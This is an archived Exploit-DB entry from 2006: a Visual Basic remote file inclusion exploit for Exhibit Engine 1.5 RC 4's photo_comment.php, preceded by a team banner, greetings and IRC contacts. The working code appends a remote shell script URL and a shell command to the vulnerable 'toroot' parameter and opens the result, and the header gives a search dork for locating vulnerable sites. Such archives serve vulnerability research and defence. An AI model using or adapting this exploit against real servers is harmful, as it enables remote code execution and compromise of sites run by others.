Exhibit Engine 1.5 RC 4 - 'photo_comment.php' File Inclusion

EDB-ID:

2509

Author:

Kacper

Type:

webapps

Platform:

PHP

Published:

2006-10-10

'
' EXPLOIT (c)oded by Kacper in Visual Basic ;-)
'
':::::::::  :::::::::: :::     ::: ::::::::::: :::
':+:    :+: :+:        :+:     :+:     :+:     :+:
'+:+    +:+ +:+        +:+     +:+     +:+     +:+
'+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+
'+#+    +#+ +#+         +#+   +#+      +#+     +#+
'#+#    #+# #+#          #+#+#+#       #+#     #+#
'#########  ##########     ###     ########### ##########
'::::::::::: ::::::::::     :::     ::::    ::::
'    :+:     :+:          :+: :+:   +:+:+: :+:+:+
'    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
'    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
'    +#+     +#+        +#+     +#+ +#+       +#+
'    #+#     #+#        #+#     #+# #+#       #+#
'    ###     ########## ###     ### ###       ###
'
'
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- Exhibit Engine <= 1.5 RC 4 (photo_comment.php) Remote File Include Exploit
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- [Script name: Exhibit Engine 1.5 RC 4
'- [Script site: http://www.edrotberg.org/gallery/
'- dork: "generated by Exhibit Engine 1.5 RC 4"
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-          Find by: Kacper (a.k.a Rahim)
'+
'-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
'+
'-          Contact: kacper1964@yahoo.pl
'-                        or
'-           http://www.rahim.webd.pl/
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'- Special Greetz: DragonHeart ;-)
'- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
'-      SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios, SpiderZ
'-
'- Greetz for all users DEVIL TEAM IRC Channel !!
'!@ Przyjazni nie da sie zamienic na marne korzysci @!
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'+
'-            Z Dedykacja dla osoby,
'-         bez ktorej nie mogl bym zyc...
'-           K.C:* J.M (a.k.a Magaja)
'+
'+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private Sub Form_Load()

'**********************SETTINGS**************************
' strona = path to script
' evil_script = path to shell
' cma = shell command
'********************************************************

strona = "http://www.strona.pl/"
evil_script = "http://www.strona.pl/shell.txt?"
cmd = "ls -la"

'********************************************************
Call MsgBox("DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam .... or http://www.rahim.webd.pl/", vbCritical, "See You back again :D !!")
vul = "photo_comment.php?toroot="
exploit = strona & vul & evil_script & cmd
PageLocation$ = exploit
ShellX = Shell("explorer.exe " + PageLocation$)
Unload Me
End Sub

'************************eof*****************************
' Pozdr0 dla ludzi dobrej woli :D
'
'DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam

' milw0rm.com [2006-10-10]